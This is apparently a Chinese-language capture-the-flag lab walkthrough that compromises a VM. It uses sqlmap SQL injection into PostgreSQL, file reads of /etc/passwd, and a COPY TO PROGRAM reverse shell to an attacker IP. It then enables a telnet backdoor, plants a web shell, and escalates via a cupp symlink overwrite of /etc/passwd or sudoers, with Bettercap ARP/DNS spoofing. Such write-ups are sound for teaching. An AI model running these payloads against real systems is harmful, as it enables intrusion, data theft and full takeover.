    Payload: keyword=1' UNION ALL SELECT NULL,(CHR(113)||CHR(118)||CHR(120)||CHR(107)||CHR(113))||(CHR(112)||CHR(72)||CHR(101)||CHR(86)||CHR(82)||CHR(110)||CHR(90)||CHR(101)||CHR(71)||CHR(113)||CHR(105)||CHR(110)||CHR(114)||CHR(119)||CHR(97)||CHR(68)||CHR(88)||CHR(112)||CHR(111)||CHR(117)||CHR(65)||CHR(80)||CHR(109)||CHR(107)||CHR(83)||CHR(72)||CHR(108)||CHR(117)||CHR(66)||CHR(79)||CHR(121)||CHR(71)||CHR(101)||CHR(110)||CHR(85)||CHR(68)||CHR(88)||CHR(105)||CHR(114)||CHR(88))||(CHR(113)||CHR(118)||CHR(98)||CHR(122)||CHR(113)),NULL-- FHqn
---
[08:46:36] [INFO] the back-end DBMS is PostgreSQL
back-end DBMS: PostgreSQL
[08:46:36] [INFO] testing if current user is DBA
current user is DBA: True
[08:46:36] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.111'
[08:46:36] [WARNING] your sqlmap version is outdated

[*] ending @ 08:46:36 /2025-12-09/


我们拥有数据库最高权限DBA

image-20251209215054238

但是并不能执行系统命令

sqlmap -r 1 -p keyword --file-read "/etc/passwd"

还是失败

原因

sqlmap的自动化脚本在 PostgreSQL 13 上遇到了兼容性问题(因为它试图使用旧的方法注入 .so 文件,而这在 Postgres 13 上被限制了)

sqlmap -r 1 --batch --technique=U -p keyword --sql-query "SELECT pg_read_file('/etc/passwd', 0, 1000000)"

这样既可读出

image-20251209220722848

还有一种更不容易被限制的方法

sqlmap -r 1 -p keyword --sql-query "SELECT lo_import('/etc/passwd')"

image-20251209220857108

# 将 16393 替换为你实际得到的 OID
sqlmap -r 1 -p keyword --sql-query "SELECT lo_get(41022)"

image-20251209221205017
只不过是导出的是二进制数据我们将其编译一下即可

xiao (UID 1001): xiao:x:1001:1001::/home/xiao:/bin/bash

这是一个普通用户,并且拥有 /bin/bash(可以登录 Shell)。

todd (UID 1000)todd:x:1000:1000:,,,:/home/todd:/bin/bash

这也是一个可以登录的用户。

secure_user (UID 1002): secure_user:x:1002:1002::/home/secure_user:/bin/bash

同样拥有 Shell 权限。

postgres (UID 112): postgres:x:112:119:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash

数据库管理员也有 Shell 权限!这意味着如果我们反弹 Shell 成功,我们会成为 postgres 用户。

image-20251209222133121

不能利用上面的方式读出用户的ssh密钥

但是我们可以写文件

';COPY (SELECT $$_$$) TO PROGRAM 'echo "bash -i >& /dev/tcp/192.168.56.112/4444 0>&1" > /tmp/rev.sh';--
';COPY (SELECT $$_$$) TO PROGRAM 'chmod +x /tmp/rev.sh';--
';COPY (SELECT $$_$$) TO PROGRAM '/bin/bash /tmp/rev.sh';--

image-20251209223948471

成功拿到shell

image-20251209224442070

得到关键信息

echo 'ENABLE_BACKDOOR' > /etc/default/telnet

telnet有后门

审查自定义登录脚本

postgres@Multi:/var/lib/postgresql$ cat /usr/local/bin/custom_login        
cat /usr/local/bin/custom_login
#!/bin/bash

printf "Username: \r\n"
read -r username
username=$(echo "$username" | tr -d '\r\n' | tr -s ' ')

if [[ -z "$username" ]]; then
    printf "invalid username\r\n"
    sleep 1
    exit 1
fi

printf "Password: \r\n"
read -s -r password
password=$(echo "$password" | tr -d '\r\n')

if [[ "$username" == "xiao" ]] && [[ -z "$password" ]]; then
    if grep -q "ENABLE_BACKDOOR" /etc/default/telnet 2>/dev/null; then
        printf "login successful\r\n"
        exec /bin/login -f xiao
        exit 0
    else
        printf "backdoor disabled\r\n"
        sleep 1
        exit 1
    fi
fi

if [[ "$username" == "xiao" ]] && [[ -n "$password" ]]; then
    printf "invalid password\r\n"
    sleep 1
    exit 1
fi

printf "login failed\r\n"
sleep 1
exit 1
postgres@Multi:/var/lib/postgresql$

整体分析就是Telnet xiao登录无需密码登陆进去就直接给一个shell

登录失败

image-20251210185320017

后门没有激活也就是历史命令中的

echo ‘ENABLE_BACKDOOR’ > /etc/default/telnet

ENABLE_BACKDOOR并没有被文件保存我们需要自己再执行一次这个命令

image-20251210185724646

image-20251210190250168

image-20251210190344288

在扫到的pub目录发现一个密码文件但是无权访问要成为www-data
在web目录写一个shell即可

image-20251210191154398

得到一个密码

是todd的密码

image-20251210192742068

看一下

cupp一个字典生成器

逻辑漏洞 + 环境配置缺陷 + 中间人攻击

image-20251210200252666

可以看到执行 sudo /usr/bin/cupp -l 后,脚本会从一个固定的 URL (http://ftp.funet.fi/…) 下载文件。下载的文件会保存在当前工作目录下,并创建一个 dictionaries/ 子目录结构

选择 1 Moby,它会尝试创建并写入文件到 ./dictionaries/Moby/mhyph.tar.gz

但是没有对路径做任何检查我们可以将目标路径设为一个符号链接,这样即可想覆盖什么就覆盖什么

image-20251210202338178

设置链接

我们可以在/etc/pass里面加上一个特权用户

image-20251210201658538

dgh:$1$hacked$mHLOr0u7iVhNIsYN5tMM.0:0:0:root:/root:/bin/bash

image-20251210202227287

接下来就是使用Bettercap欺骗靶机,让它以为 ftp.funet.fi就是我的 Kali 机器

# 1. 开启网络发现 (激活数据流)
net.probe on

# 2. 设置 ARP 欺骗 (截获流量)
set arp.spoof.targets 192.168.56.111
arp.spoof on

# 3. 设置 DNS 欺骗 (核心劫持)
# 注意:这里是用 set dns.spoof.domains,千万别输成 hosts
set dns.spoof.domains ftp.funet.fi
set dns.spoof.address 192.168.56.112
dns.spoof on

再次在靶机上运行sudo /usr/bin/cupp -l

选这1即可使特权用户添加进去

还有一种方法就是

在kali上

echo "todd ALL=(ALL) NOPASSWD: ALL" > pub/unix/security/passwd/crack/dictionaries/dictionaries/mhyph.tar.gz

链接改为覆盖/etc/sudoers.d/todd

ln -sf /etc/sudoers.d/todd dictionaries/dictionaries/mhyph.tar.gz

这样todd就获得了对任何命令使用sudo的权利

但是我劫持失败了是因为下面的原因:

VMware 和 VirtualBox 之间存在严重的“生殖隔离”(Layer 2 隔离)

虽然你在两边都配置了 192.168.56.x 的 IP,让它们在网络层 (Layer 3)也许能 Ping 通(通过宿主机的软路由),但在链路层 (Layer 2),Bettercap 根本发不出 ARP 包给靶机,因为它们在两个完全不同的虚拟交换机上
可以将你的kali和靶机迁移都到VirtualBox
也可以全部改为桥连模式
image-20251210210903307

并且开启混杂